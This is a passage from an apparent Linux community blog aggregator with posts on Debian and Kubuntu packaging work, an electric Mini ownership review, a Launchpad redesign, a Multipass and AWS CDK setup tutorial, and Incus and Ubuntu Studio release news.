Two months into my new gig and it’s going great! Tracking my time has taken a bit of getting used to, but having something that amounts to a queryable database of everything I’ve done has also allowed some helpful introspection.

Freexian sponsors up to 20% of my time on Debian tasks of my choice. In fact I’ve been spending the bulk of my time on debusine which is itself intended to accelerate work on Debian, but more details on that later. While I contribute to Freexian’s summaries now, I’ve also decided to start writing monthly posts about my free software activity as many others do, to get into some more detail.

January 2024

  • I added Incus support to autopkgtest (see the sketch after this list). Incus is a system container and virtual machine manager, forked from Canonical’s LXD. I switched my laptop over to it and then quickly found that it was inconvenient not to be able to run Debian package test suites using autopkgtest, so I tweaked autopkgtest’s existing LXD integration to support using either LXD or Incus.
  • I discovered Perl::Critic and used it to tidy up some poor practices in several of my packages, including debconf. Perl used to be my language of choice but I’ve been mostly using Python for over a decade now, so I’m not as fluent as I used to be and some mechanical assistance with spotting common errors is helpful; besides, I’m generally a big fan of applying static analysis to everything possible in the hope of reducing bug density. Of course, this did result in a couple of regressions (1, 2), but at least we caught them fairly quickly.
  • I did some overdue debconf maintenance, mainly around tidying up error message handling in several places (1, 2, 3).
  • I did some routine maintenance to move several of my upstream projects to a new Gnulib stable branch.
  • debmirror includes a useful summary of how big a Debian mirror is, but it hadn’t been updated since 2010 and the script to do so had bitrotted quite badly. I fixed that and added a recurring task for myself to refresh this every six months.
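On the Incus item above, running a package’s test suite with the new backend might look like this (a hedged sketch: the package and image names are examples, and I am assuming the Incus helpers mirror autopkgtest’s existing LXD ones):

$ autopkgtest-build-incus images:debian/sid
$ autopkgtest hello -- incus autopkgtest/debian/sid/amd64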

February 2024

  • Some time back I added AppArmor and seccomp confinement to man-db. This was mainly motivated by a desire to support manual pages in snaps (which is still open several years later …), but since reading manual pages involves a non-trivial text processing toolchain mostly written in C++, I thought it was reasonable to assume that some day it might have a vulnerability even though its track record has been good; so man now restricts the system calls that groff can execute and the parts of the file system that it can access. I stand by this, but it did cause some problems that have needed a succession of small fixes over the years. This month I issued DLA-3731-1, backporting some of those fixes to buster.
  • I spent some time chasing a console-setup build failure following the removal of kFreeBSD support, which was uploaded by mistake. I suggested a set of fixes for this, but the author of the change to remove kFreeBSD support decided to take a different approach (fair enough), so I’ve abandoned this.
  • I updated the Debian zope.testrunner package to 6.3.1.
  • openssh:
    • A Freexian collaborator had a problem with automating installations involving changes to /etc/ssh/sshd_config. This turned out to be resolvable without any changes, but in the process of investigating I noticed that my dodgy arrangements to avoid ucf prompts in certain cases had bitrotted slightly, which meant that some people might be prompted unnecessarily. I fixed this and arranged for it not to happen again.
    • Following a recent debian-devel discussion, I realized that some particularly awkward code in the OpenSSH packaging was now obsolete, and removed it.
  • I backported a python-channels-redis fix to bookworm. I wasn’t the first person to run into this, but I rediscovered it while working on debusine and it was confusing enough that it seemed worth fixing in stable.
  • I fixed a simple build failure in storm.
  • I dug into a very confusing cluster of celery build failures (1, 2, 3), and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable thanks to Stefano Rivera. Getting celery back into testing is blocked on the 64-bit time_t transition for now, but once that’s out of the way it should flow smoothly again.
on March 04, 2024 10:39 AM

March 03, 2024

tl;dr I have had a Mini EV for a little over two years, so I thought it was time for a retrospective. This isn’t so much a review as I’m not a car journalist. It’s more just my thoughts of owning an electric car for a couple of years.

I briefly talked about the car in episode 24 of Linux Matters Podcast, if you prefer a shorter, less detailed review in audio format.

Mini Mini review

Patreon supporters of Linux Matters can get the show a day or so early, and without adverts. 🙏

Introduction

In August 2020, amid [The Event], and my approaching 50th birthday, I figured it was about time for a mid-life crisis. So, after a glass of wine, late one evening, I filled in a test-drive request form for a Tesla electric car.

I was surprised to get a call from a Tesla representative the next day to organise the booking. A week later, I turned up at the nearest Tesla “dealership” in an industrial estate near Heathrow Airport to pick up the car.

I had maybe twenty minutes to drive the car alone, on a fixed route, and then bring it back. I’d never driven a fully electric car before that, nor even been in one as a passenger, that I recall. I’ve been in countless Toyota Prius over the years as the go-to taxi for the discerning cabbie.

I had no intention of buying the car, so we parted ways after the drive. The salesman was phlegmatic about this. He said it didn’t matter because now I’ve driven one and had a positive experience, I’d be more likely to rent a Tesla or talk about the experience with friends.

Not yet done the former; definitely have done the latter.

Shopping around

A year later, my pangs for a new car continued. I also took a Citroen EC5 out for a spin and borrowed a Renault ZOE. Both were decent cars, but not really what I was after. The Citroen was too big, and the ZOE had an ugly, fat arse-end.

Then I took a look at the Mini. Initially, it wasn’t on my radar, but then I watched every video review and hands-on I could find. I was almost already sold on it when I took one out for a test drive. Indeed, after telling the amiable and chilled sales guy which cars I’d already test-driven, he said, “If you drive the Mini, you’ll buy it, not the others”.

“That is a bold claim!”, I thought.

He was right though. I bought one. Here it is some months later, at a “favourite” charging spot late one night.

Chippenham charging

I’ve had many cars over the years, some second-hand, a few hand-me-downs in the family, but never a new car for me, for my pleasure. I do enjoy driving, but less so commuting in traffic, which is handy now I’ve worked from home for over a decade.

Now the kids are grown up, and the wife has a slightly larger car if we all go somewhere. I can get away with a two-door car.

Specs

I went for the “2021 BMW Mini Cooper Level 3”, as it’s known officially. The design is from 2019 and has been replaced in 2024. Level 3 refers to the car’s trim level and is one of the highest. There were a few additional optional extras, which I didn’t choose to buy.

The one option I wish I’d got is adaptive cruise control, which is handy on UK motorways. Dial in a speed and let the car adjust dynamically as the car in front slows or speeds up. My wife’s car has it, and I am mildly kicking myself I didn’t get it for the Mini.

The full spec and trim can be seen in the BMW PDF. Here’s the page about my car’s specifications. Click to make it bigger.

Specification

I went for black paint and the “3-pin plug” inspired wheels. They’re quite quirky and look rather cool at low speed due to their asymmetry. Not that I see that view often, as I’m usually driving.

Here’s what it looks like when you’re speccing up the Mini online. This is a pretty accurate representation of the car.

Ordering a Mini

Driving

The most important part of a car is how it drives. I love driving this thing. The Mini EV is tremendously fun to drive. It’s relatively quick off the mark, which makes it great for safe overtaking. Getting away from the lights is super fun too.

Being an EV, it’s got a heavy battery, so it doesn’t skip around much on the road. I’ve always felt in control of the car; it drives very much like a go-kart, point-and-shoot.

Without a petrol engine, there’s certainly less noise and vibration while driving. Road and wind noise are audible, but it’s pleasantly quiet when pootling around town. As required by law, it makes some interesting “spacey” noises at low speed, so pedestrians can hear you coming. Although I’ve surprised a few people and animals when they couldn’t.

Unlike the four-door Mini Clubman, it’s got long rimless doors, which make for getting in and out a bit easier. They also look cool. I’ve always enjoyed the look of a two-door coupe or hatchback car with rimless front windows.

There are four driving modes, Normal (the default), Sport, Green and Green+. Green+ is the eco-warrior mode which turns all the fans off, and reduces energy consumption quite a bit, extending the overall range. Sport is at the other end of the scale, consuming more power, being more responsive, and lighting the car interior in red, which is cute.

There are two levels of regenerative braking, which is on by default. I never change this setting, but you can. It means I can drive with one pedal, letting the regenerative braking reduce speed as I approach junctions or traffic. I rarely use the brake pedal at all.

The brake lights do illuminate when regenerative braking is occurring, which I’m sure is annoying for the person behind me when I’m hovering between go and stop. The car doesn’t come to a complete stop if you remove your feet from the pedals, so I do have to use the brake pedal to completely stop the car, which is a shame.

Driving in London

London has a Congestion Charge (CC) and a (controversial) Ultra Low Emissions Zone (ULEZ). Cars have to pay to enter the centre of London, with some exceptions. As the Mini is electric, it currently doesn’t have to pay the CC. However, in order to qualify for exemption from the £15 daily charge, you have to pay a £10 annual registration charge.

I sometimes use “JustPark” to find interesting places to put the car while I’m in London. Here I found a spot in the grounds of an old church.

Parked in London

I have always loved driving in central London, I’ve used this perk a fair few times to drive into the centre of London for work, to meet friends or go out in the evening. It’s cheaper for me to drive into the centre of London and park than it is to get a return train ticket, which is mad.

Space

It’s a two-door car that can seat two adults comfortably in the front and two kids in the back. Or four adults uncomfortably as the legroom in the back is quite cramped. I never sit in the back, so I don’t care about that.

On the odd occasion, the four of us (two adults and two teenage kids) have been in the car together, it’s been fine. I wouldn’t do a long journey like that, though.

The seats are comfortable, even for a relatively long drive, and being small, everything is very much within reach. I’m almost 6ft tall and fit just fine. However, with the seat far back, my view of traffic lights when in the front of a queue is somewhat limited. The mirror also obscures my view more than most cars, as it’s parallel to my eyes rather than “up and to the left” as it would be in a larger cabin.

There are two sunroofs, each with a manual sliding mesh shade on the underside. The front roof can be tilted or slid open using a switch in the overhead panel. The rear sunroof doesn’t open.

Interior

The interior is a mix of retro Mini styling and new fangled screens. It has a big round central circle harking back to the original Mini speedo. Here though, it contains a rectangular display. There are physical controls for air conditioning, seat warmers, parking assistance, media controls, navigation, the lot. While the display is a touch screen, that’s rarely needed when using the built-in software.

It looks like this, but with the steering wheel on the right (correct) side.

Mini interior

I should mention that I don’t like the buttons on the steering wheel, nor those immediately under the display. They’re flat rocker-style ones, which you have to look at to find. The previous generation of Mini had raised round buttons, which are much easier for fingers to find.

The built-in navigation system is pretty trashy, like most cars. I’ve never found a car with a decent navigation system that can beat Android Auto or Apple Car Play. I also like using Waze, Apple Maps, and a podcast app while driving.

In this photo, you can see the navigation display, which highlights the expected current range with the circle around the car’s location. Also note the “mode” button, which is one of the flat ones I dislike in the car. The lights around the display illuminate to show the temperature of the heating, or the volume of the audio system, while you adjust them.

Navigation

One benefit of the onboard navigation system is that driving instructions and lane recommendations appear on the Head-Up Display (HUD) in front of the driver. The downside of mobile apps on the mini is they don’t have access to the HUD, so I have to glance across at the central display to see where I need to turn. Alternatively, I could turn the volume on the mobile map app up, but that would interrupt podcasts in an annoying way.

I suspect this is a missing feature of the BMW on-board software, which may be fixed in a later release. I drove a brand new BMW which had a similar HUD that integrated with the navigation system on my phone. Mine doesn’t have that software though.

The back seats can be folded to provide more boot space, especially in a car with little luggage space. I’ve used the Mini for a ‘big shop’ with the seats folded down and can get plenty of ‘bags for life’ in there, full of groceries.

There are the usual media controls on one side of the steering wheel, as well as cruise and speed limit controls on the other. Window, sunroof and other important controls all have buttons in the expected places. A minimalist-button Tesla, this is not.

There’s an induction phone charger inside the armrest. The best part about this is with Apple CarPlay, I can just hide the phone in there, charging, so I’m not distracted while driving. The worst part is I frequently forget the phone is in there, and leave it when walking away from the car.

Power

The Mini is a BEV (battery EV) instead of a PHEV (plug-in hybrid EV) - like a Prius or BMW i3, so it has no petrol engine but relies on the battery powering a single motor to propel the car.

The Mini is sold with only one battery option, a 30 kWh capacity with an estimated 140-mile range. There’s a CCS (Combined Charging System, Combo 2) socket under a flap on the rear driver’s side, so it can do slower AC charging or faster DC charging.

The car has all the cables required for charging from a 13-amp socket at home or a 7Kw domestic or public “slow” charger. Faster public chargers have integrated fat cables.

A few days before the car arrived, I had a charger installed at home on the outside wall of the house. I’m fortunate to have a driveway at the front of the house. So I typically park the car on it and plug in when I get out.

Sometimes, I forget or don’t bother if I know the battery still has plenty of charge and I do not have any upcoming long journeys. But more often than not, I try always to plug it in, even if it won’t be charging until the next day.

Charging

In my personal experience, most charges are done at home. I have charged in many places away from home, but that’s not very common for me. The last time I checked the stats, it had been around 86% charging at home and 14% on public chargers.

I often take a photo of the car while it’s charging in a public place. Usually to share on social media to spark a conversation about charging infrastructure. On this occasion I was using a charger in the car park at Chepstow Castle.

I know petrol heads often bleat about the very idea of waiting while the car fills up, but sometimes it leads to nice places, like this. This was a pretty slow charger, but I didn’t really care, as I had a castle to walk around!

Dragon charging

Sometimes the locations are less pretty. This is Chippenham Pit-Stop, which does a great breakfast while you wait for your car to charge.

Chippenham charging

Ohme at HOME

My home charger is made by Ohme. It has a display and a few weatherproof buttons to be directly operated without needing an app. However, a few additional features are only available if the app is installed.

The Ohme app can access my energy provider via an API, which lets the charger know the optimal time to start charging the car from a pricing perspective. That seems to work well with Octopus Energy, my domestic provider.

It’s possible to define multiple charging schedules to ensure the car is ready for departure at the time you’re leaving.

Ohme

The Ohme app is also supposed to be able to talk to the BMW API with my credentials, in order to communicate with the car. This has never worked for me. I have had calls and emails with Ohme about this, but I gave up in frustration. It just doesn’t work.

That doesn’t stop the car from actually charging though. Indeed, according to the stats in the app (which I only discovered while writing this blog) - I’ve charged for over 720 hours at home in the last twelve months. The dip in November & December is explained below under “Crash repair”.

Ohme stats

Issues

There are a few issues I’ve had with the car.

App registration

The car has its own mobile connectivity, and talks to BMW periodically. But for that to work, you have to successfully pair the car with your phone app. The pairing process between the mobile app and the car itself should just be a case of entering the Vehicle Identification Number in the app. Sadly this didn’t work. I don’t know what was wrong, but it took around two weeks for it to be fixed.

Home Sweet Home

The onboard navigation system had my address wrong. The house number it showed for my home doesn’t exist, and mine wasn’t in the database. The house has been here and numbered correctly for over 50 years. It was only a minor thing because I happened to know where I lived, and how to get there. It just irritated me that my own car, on my driveway, thought it was somewhere else.

I called Mini customer services, and they didn’t seem to think it was easily fixable; I should just hope for a map update.

So I did the nerd thing, and found out who the map supplier was - “Nokia Here” - and submitted a request to fix the data there. Later, I got a map update from BMW which contained my fix. That’s one way to do it.

Unable to charge

Within a year of owning the car, it stopped charging at home. The AC charging port just wouldn’t work. I could charge at the fast public DC chargers nearby, but my home charger stopped working.

Unable to charge

When I reported the problem to BMW, their assumption was that the wall box on my house was broken. We disproved this by showing a different car charging from the home wall box, and my car refusing to charge from public AC chargers.

The BMW dealership were still very reluctant to accept that there was a problem with the car. I had to drive it to the dealership and put the car on their own slow charger to show them it failing to charge. Only once I’d done that did they allow me to book it in for repair the next day.

In a bit of a dick move, I drove around to empty the battery completely, rocking up to the dealership with the car angrily telling me it had 0% charge. That way they’d have to fix it to charge it to get it back to me. They did indeed fix the problem with the charging system, which took quite a while.

Zero

I got a rather fancy BMW i7 on loan while they repaired the car.

When I went to pick the car up, they were very apologetic that it took so long and gave me a bag of Mini merch as a gift. When I went to open the boot to put the bag away, I noticed that there was a panel unclipped and some disconnected wires dangling around in the boot. I had to call someone from the garage over to fix it before I could drive away.

I was a little sad that the car clearly hadn’t been fully checked over before I was given it back.

Unplugging

During cold weather in winter, the charger plug sometimes gets stuck - frozen - in the socket. This can be quite frustrating, as it’s impossible to set off to work while the cable is still attached to the house! I found some plumber’s grease, which I smeared around the plug in the hope of lubricating it and reducing the ingress or condensation of water. So far, that’s helped.

I took a wrong turn down a long A-road one night, which meant I didn’t have sufficient charge to get home without stopping to top up. I thought I’d try the internal navigation system, which has a database of charging stations.

The first location it took me to was a hotel. I drove around the car park and couldn’t find a charger at all - not necessarily the navigation system’s fault; to be fair, the hotel signage didn’t help. I gave up and chose the next nearest charger on the map. It confidently took me down some narrow lanes and stopped at a closed gate which was the entrance to a farm. It looked to me like a private residence.

I gave up and switched to an app on my phone, and ended up at a nearby Tesla charging station where there were many free spaces, and I was able to charge with ease. It possibly should have offered me that one first!

App nagging

As I mentioned above, there is a Mini app for Android and iOS for managing the car. In it you can do some simple things like lock and unlock the car, turn the lights on, and enable the climate control before setting off. It also has a record of charging sessions, a map for finding chargers, and other useful information like locating the car, and showing battery charge level and estimated range.

It nags you constantly to say how great or bad the app is, and, inexplicably, whether you’d recommend it to friends or colleagues on a scale of 0 to 10. I cannot fathom the kind of person who recommends apps to friends who do not own the car the app is for. It’s completely mental.

Rating

Every time the dialog comes up - and it’s come up a lot - I rate the app zero, and leave an increasingly irritated message to the developers to stop asking me. I have also filed a ticket with BMW. Their engineers came back to me with details of exactly how often it asks, based on how often you open the app, and the interval between one opening and the next.

You can’t turn this off. It’s super irritating, and I still get asked two years later. I still give it a zero, despite the app having some useful features.

Full flaps

The charge port is covered by a hinged flap, just like in a petrol car. The Mini recently started nagging me that the flap was open when it wasn’t. No amount of opening and closing would stop the car nagging me. Thankfully it still let me drive, with a little warning triangle on screen. I let the dealership know, and they fixed it during the upcoming maintenance visit.

Crash repair

In November my wife was involved in a crash when someone pulled out in front of her from behind traffic. She was only slightly injured, and the car was structurally fine, but a bit smashed up at the front. The other driver was at fault, and it was all sorted out via insurance. The local BMW-approved repair centre had the car from November to January while I had a hire car on loan. The car came back as good as new.

No spare tyre

It’s a small car, so there’s no room for a spare wheel. I had a puncture recently and managed to limp the car back home. I pressed the SOS button in the car and got put through to a friendly agent.

They organised a BMW engineer to come out and change the wheel. He arrived very quickly, jumped out of his van and took the wheel off my car, replacing it with a spare he had in the van.

He then put my wheel in the boot of my car and asked me to text him once I’d got mine fixed, so he could pick his spare up again. I got it fixed within a day or so and, as I was out at work, left his spare somewhere safe. He happily came and collected it. I was pretty pleased with this whole experience.

Maintenance

As I got closer to the two-year anniversary of ownership, the app started to remind me to book the car for a service. There’s a feature in the app to just press a button, and get taken to a page where you can book the car in. The links are all broken and always have been. I don’t have the energy to call BMW to tell them it’s all broken. They should do better QA on the app.

Eventually I just called the garage to get the car maintained. There was a scheduled two-year inspection, a low priority recall, brake check and my broken ‘fuel flap’ to fix. They had the car all day and everything was complete when I picked it up at the end of the day.

The fact that an EV has no oil changes, oil filter replacements, spark plug replacements, timing chains/belts, or many of the other parts that fail is quite attractive. But there’s still a regular service which needs doing.

Some argue that because the car has a one-pedal driving mode, where regenerative braking slows the car down, drivers are less likely to wear out the brakes. However, I’ve also seen it asserted that some cars actually use both regenerative braking and the physical disc brakes without letting the driver know. I have no idea whether the Mini “smartly” applies the brakes, or if it only does so when I press the brake pedal.

Conclusion

I love the Mini EV. I love driving it, and often make excuses to drive somewhere, or I’ll go the ‘long way round’ in order to spend more time in it. It’s not perfect, but it’s super fun to drive.

As for it being my first EV: while the network of public EV chargers isn’t amazing, there are enough where I live and travel to meet my needs. I don’t think I’ll go back to a petrol car anytime soon.

We’re also considering replacing my wife’s car soon, and will look at electric options for that too.

There’s a new, refreshed Mini model out that the local dealership salespeople seem keen for me to test drive. Having seen it on video, but not in person, I’m not convinced I’ll like it. We’ll see.

on March 03, 2024 12:00 PM

March 01, 2024

First I would like to give a big congratulations to KDE for a superb KDE 6 mega release 🙂 While we couldn’t go with 6 on our upcoming LTS release, I do recommend KDE neon if you want to give it a try! I want to say it again: I firmly stand by the Kubuntu Council in the decision to stay with the rock-solid Plasma 5 for the 24.04 LTS release. The timing was just too close to feature freeze, and the last time we went with the shiny new stuff on an LTS release, it was a nightmare (KDE 4, anyone?). So without further ado, my weekly wrap-up.

Kubuntu:

Continuing efforts from last week (Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads), it has been another wild and crazy week getting everything in before feature freeze yesterday. We will still be uploading the upcoming Plasma 5.27.11, as it is a bug-fix release 🙂 and right now it is all about finding and fixing bugs! Aside from many uploads, my accomplishments this week are:

  • Kept a close eye on Excuses and fixed tests as needed. It seems riscv64 tests were turned off by default, which broke several of our builds.
  • I did a complete revamp of our seed / kubuntu-desktop meta package! I have ensured we are following KDE packaging recommendations. Unfortunately, we cannot ship maliit-keyboard as we get hit by LP 2039721 which makes for an unpleasant experience.
  • I did some more work on our custom plasma-welcome which now just needs some branding, which leads to a friendly reminder the contest is still open! https://kubuntu.org/news/kubuntu-graphic-design-contest/
  • Bug triage! Oh so many bugs, from back when I worked on Kubuntu 10 years ago and Plasma 5 was new. I am triaging and reducing this list to more recent bugs (which is a much smaller list). This reaffirms our decision to go with a rock-solid, stable Plasma 5 for this LTS release.
  • I spent some time debugging kio-gdrive, which no longer works (it works in Jammy), so I am tracking down what is broken. I thought it was 2FA, but my non-2FA account doesn’t work either; it just repeatedly throws up the Google auth dialog. So this is still a WIP. It was suggested to me to disable online accounts altogether, but I would prefer to give users the full experience.
  • Fixed our ISO builds. We are still not quite ready for testers as we have some Calamares fixes in the pipeline. Be on the lookout for a call for testers soon 🙂
  • Wrote a script to update our ( Kubuntu ) packageset to cover all the new packages accumulated over the years and remove packages that are defunct / removed.

What comes next? Testing, testing, testing! Bug fixes and of course our re-branding. My focus is on bug triage right now. I am also working on new projects in launchpad to easily track our bugs as right now they are all over the place and hard to track down.

Snaps:

I have started the MRs to fix our latest 23.08.5 snaps and hope to get these finished in the next week or so. I have also been speaking to a prospective student with some GSoC ideas that I really like and will mentor; hopefully we are not too late.

Happy with my work? My continued employment depends on you! Please consider a donation http://kubuntu.org/donate

Thank you!

on March 01, 2024 04:38 PM

Launchpad’s new homepage

Launchpad has been around for a while, and its frontpage has remained untouched for a few years now.

If you go to launchpad.net, you’ll notice it looks quite different from what it has looked like for the past 10 years - it has been updated! The goal was to modernize it while keeping it looking like Launchpad. The contents have remained the same with only a few text additions, but there were a lot of styling changes.

The most relevant change is that the frontpage now uses Vanilla components (https://vanillaframework.io/docs). This alone not only made the layout look more modern, but also made it better for a curious new user reaching the page from a mobile device. The accessibility score of the page - calculated with Google’s Lighthouse extension - increased from 75 to an almost-perfect 98!

Given the frontpage is so often the first impression users get when they want to check out Launchpad, we started there. But in the future, we envision the rest of Launchpad looking more modern and having a more intuitive UX.

As a final note, thank you to Peter Makowski for always giving a helping hand with frontend changes in Launchpad.

If you have any feedback for us, don’t forget to reach out in any of our channels. For feature requests you can reach us at feedback@launchpad.net or open a report in https://bugs.launchpad.net/launchpad.

To conclude this post, here is what Launchpad looked like in 2006, yesterday and today.


Launchpad in 2006

Launchpad yesterday

Launchpad today

on March 01, 2024 01:55 PM

February 25, 2024

I want to be able to connect to the environment using Visual Studio Code, so first we need to create an SSH key:

ssh-keygen -t rsa
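
The key pair lands in ~/.ssh by default; assuming that default path, you can print the public half (the part the YAML below needs) with:

cat ~/.ssh/id_rsa.pub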

We need a cloud-init configuration file; replace <generated ssh-rsa key> with the public key generated above, and save it as cloud-init.yaml:

groups:
  - vscode
runcmd:
  - adduser ubuntu vscode
ssh_authorized_keys:
  - ssh-rsa <generated ssh-rsa key>

Assuming you’ve got Multipass installed (if not sudo snap install multipass) then:

multipass launch mantic --name ubuntu-cdk --cloud-init cloud-init.yaml
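
Cloud-init runs asynchronously after the VM boots. If you want to be certain it has finished before continuing, one way (a sketch, using the instance name from above) is to wait on its status:

multipass exec ubuntu-cdk -- cloud-init status --wait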

We’ll come back to Visual Studio Code later, but first let’s set everything up in the VM. We need to install aws-cli, which I want to use with SSO (hence installing Mantic).

multipass shell ubuntu-cdk
sudo apt install awscli
aws configure sso

Follow the prompts and sign in to AWS as usual. Then install CDK:

sudo apt install nodejs npm
sudo npm install -g aws-cdk

Almost there. Let’s bootstrap1 (provisioning resources needed to make deployments), substituting the relevant values:

cdk bootstrap aws://<account>/<region> --profile <profile>

You should see a screen like this:

Create a new CDK application by creating a new folder, changing into it and initialising CDK:

mkdir cdk-app && cd cdk-app
cdk init app --language python
source .venv/bin/activate
python -m pip install -r requirements.txt
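
From here the usual CDK workflow applies. As a quick sketch (the profile name is a placeholder), synthesise the CloudFormation template and then deploy it:

cdk synth
cdk deploy --profile <profile>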

And that’s about it, except for Visual Studio Code. You’ll need to install Microsoft’s Remote-SSH extension:

You can get the IP address from multipass list, then in Code add a new SSH connection using ubuntu@<ip>:

Accept the various options presented and you’re there!

VSCode
  1. Bootstrapping provisions resources in your environment such as an Amazon Simple Storage Service (Amazon S3) bucket for storing files and AWS Identity and Access Management (IAM) roles that grant permissions needed to perform deployments. These resources get provisioned in an AWS CloudFormation stack, called the bootstrap stack. It is usually named CDKToolkit. Like any AWS CloudFormation stack, it will appear in the AWS CloudFormation console of your environment once it has been deployed. ↩
on February 25, 2024 10:01 PM

Plasma Pass 1.2.2

Jonathan Riddell

Plasma Pass is a Plasma applet for the Pass password manager

This release includes build fixes for Plasma 6, due to be released later this week.

URL: https://download.kde.org/stable/plasma-pass/
Sha256: 2a726455084d7806fe78bc8aa6222a44f328b6063479f8b7afc3692e18c397ce
Signed by E0A3EB202F8E57528E13E72FD7574483BB57B18D Jonathan Esk-Riddell <jr@jriddell.org>
https://jriddell.org/esk-riddell.gpg

on February 25, 2024 11:57 AM

February 23, 2024

As we get to the close of February 2024, we’re also getting close to Feature Freeze for Ubuntu Studio 24.04 and, therefore, a closer look at what Ubuntu Studio 24.04 LTS will look like!

Before we get to that, however, we do want to let everyone know that community donations are down. We understand these are trying times for us all, and we just want to remind everyone that the creation and maintenance of Ubuntu Studio does come at some expense, such as electricity, internet, and equipment costs. All of that is in addition to the tireless hours our project leader, Erich Eickmeyer, is putting into this project daily.

Additionally, some recurring donations are failing. We’re not sure if they’re due to expired payment methods or inadequate funds, but we have no way to reach the people whose recurring donations have failed other than this method. So, if you have received any kind of notice, we kindly ask that you would check to see why those donations are failing. If you’d like to cancel, then that’s not a problem either.

If you find Ubuntu Studio useful or agree with its mission, we ask that you contribute a donation or subscribe using one of the methods below.

Ubuntu Studio Will Always Remain a Free Download. That Will Not Change. The work that goes into producing it, however, is not free, and for that reason, we ask for voluntary donations.

  • Donate using PayPal (monthly or one-time)
  • Donate using Liberapay (weekly, monthly, or annually)
  • Donate using Patreon (monthly)


The New Installer

Progress has been made on the new installer, and for a while, it was working. However, at this time, the code is entirely in the hands of the Ubuntu Desktop Team at Canonical and we at Ubuntu Studio have no control over it.

This is currently where it gets stuck. We have no control over this at present.

Additionally, while we do appreciate testing, no amount of testing or bug reporting will fix this, so we ask that you be patient.

Wallpaper Competition

Our Wallpaper Competition for Ubuntu Studio 24.04 LTS is underway! We’ve received a handful of submissions but would love to see more!

Moving from IRC back to Matrix

Our support chat is moving back from IRC to Matrix! As you may recall, we had a Matrix room as our support chat until recently. However, the entire Ubuntu community has now begun a migration to Matrix for its communication needs, and Ubuntu Studio will be following. Stay tuned for more information on that; our links will also be changing on the website, and the menu links will default to Matrix as of Ubuntu Studio 24.04 LTS’s release.

PulseAudio-Jack/Studio Controls Deprecation

Beginning in Ubuntu Studio 24.04 LTS, the old PulseAudio-JACK bridging/configuration, while still installable and usable with Studio Controls, will no longer be supported and will not be recommended for use. For most people, the default configuration will suffice: PipeWire with the PipeWire-JACK configuration enabled, which can be disabled on the fly if one wishes to use JACKd2 with QJackCtl.

While Studio Controls started out as our in-house-built Ubuntu Studio Controls, it is no longer useful, as its functionality has largely been replaced by the full low-latency audio integration and bridging that PipeWire provides.


With that, we hope our next update will provide you with better news regarding the installer, so keep your eyes on this space!

on February 23, 2024 10:48 PM

Announcing Incus 0.6

Stéphane Graber

Looking for something to do this weekend? How about trying out the all new Incus 0.6!

This Incus release is quite the feature-packed one! It comes with an all-new storage driver that allows a shared disk to be used for storage across a cluster. On top of that, we also have support for backing up and restoring storage buckets, control over access to shared block devices, the ability to list images across all projects, a number of OVN improvements, and more!

The full announcement and changelog can be found here.
And for those who prefer videos, here’s the release overview video:

You can take the latest release of Incus up for a spin through our online demo service at: https://linuxcontainers.org/incus/try-it/

And as always, my company is offering commercial support on Incus, ranging from by-the-hour support contracts to one-off services on things like initial migration from LXD, review of your deployment to squeeze the most out of Incus or even feature sponsorship. You’ll find all details of that here: https://zabbly.com/incus

Donations towards my work on this and other open source projects are also always appreciated; you can find me on GitHub Sponsors, Patreon and Ko-fi.

Enjoy!

on February 23, 2024 10:17 PM

Kubuntu Graphic Design Contest

Kubuntu General News

Announcing the Kubuntu Graphic Design Contest:

Shape the Future of Kubuntu

We’re thrilled to unveil an extraordinary opportunity for creatives and enthusiasts within and beyond the Kubuntu community:

The Kubuntu Graphic Design Contest.

This competition invites talented designers to play a pivotal role in shaping the next generation of the Kubuntu brand. It’s your chance to leave a lasting mark on one of the most beloved Linux distributions in the world.

What We’re Looking For:

The contest centers on reimagining and modernizing the Kubuntu brand, including the logo, colour palette, fonts, and the default desktop environment for the upcoming Kubuntu 24.04 release. We’re seeking innovative designs that reflect the essence of Kubuntu while resonating with both current users and newcomers.

Guidelines:

Inspiration: Contestants are encouraged to review the current brand and styles of kubuntu.org, kde.org, and ubuntu.com to understand the foundational elements of our visual identity.

Creativity and Modernity: Your submission should propose a fresh, modern look and feel for the Kubuntu brand and its supporting marketing materials. Think outside the box to create something truly unique.

Cohesion: While innovation is key, entries should maintain a cohesive relationship with the broader KDE and Ubuntu ecosystems, ensuring a seamless user experience across platforms.

How to Participate:

The contest is open now! We welcome designers from all backgrounds to contribute their vision for Kubuntu’s future.

Multiple entries are allowed, giving you ample opportunity to showcase your creativity.

Submission Deadline: All entries must be submitted by 23:59 on Sunday, 31st March.

Prizes:

Winner will have the honour of seeing their design become the face of Kubuntu 24.04, receiving recognition across our platforms and within the global open-source community.

First Prize:

  • Global recognition of your design as the new face of Kubuntu.
  • A trophy and certificate.
  • A Kubuntu LTS optimized and validated computer: the Kubuntu Focus Ir14 Laptop or the Kubuntu Focus NX MiniPC with 32 GB of RAM – over a $1,000 value.
  • Kubuntu Focus branded merchandise up to $50 USD shipped.

Second Prize:

  • Your runner up entry featured on kubuntu.org.
  • A trophy and certificate.
  • Kubuntu Focus branded merchandise up to $50 USD shipped.

Third Prize:

Join the Contest:

This is more than a competition; it’s a chance to contribute to a project that powers the computers of millions around the world. Whether you’re a seasoned designer or a passionate amateur, we invite you to bring your vision to life and help define the future of Kubuntu.

For more details on how to submit your designs and contest rules, visit our contest page.

Let’s create something extraordinary together. Your design could be the next symbol of Kubuntu’s innovation and community spirit.

Apply now: Contest Page

on February 23, 2024 07:41 PM
Witch Wells AZ Sunset

It has been a very busy 3 weeks here in Kubuntu!

Kubuntu 22.04.4 LTS has been released and can be downloaded from here: https://kubuntu.org/getkubuntu/

Work done for the upcoming 24.04 LTS release:

  • Frameworks 5.115 is in proposed waiting for the Qt transition to complete.
  • Debian merges for Plasma 5.27.10 are done, and I have confirmed there will be another bugfix release on March 6th.
  • Applications 23.08.5 is being worked on right now.
  • Added support for riscv64 hardware.
  • Bug triaging and several fixes!
  • I am working on Kubuntu branded Plasma-Welcome, Orca support and much more!
  • Aaron and the Kfocus team have been doing some amazing work getting Calamares perfected for release! Thank you!
  • Rick has been working hard on revamping kubuntu.org, stay tuned! Thank you!
  • I have added several more apparmor profiles for packages affected by https://bugs.launchpad.net/ubuntu/+source/kgeotag/+bug/2046844
  • I have aligned our meta package to adhere to https://community.kde.org/Distributions/Packaging_Recommendations and will continue to apply the rest of the fixes suggested there. Thanks for the tip Nate!

We have a branding contest! Please do enter, there are some exciting prizes https://kubuntu.org/news/kubuntu-graphic-design-contest/

Debian:

I have uploaded to NEW the following packages:

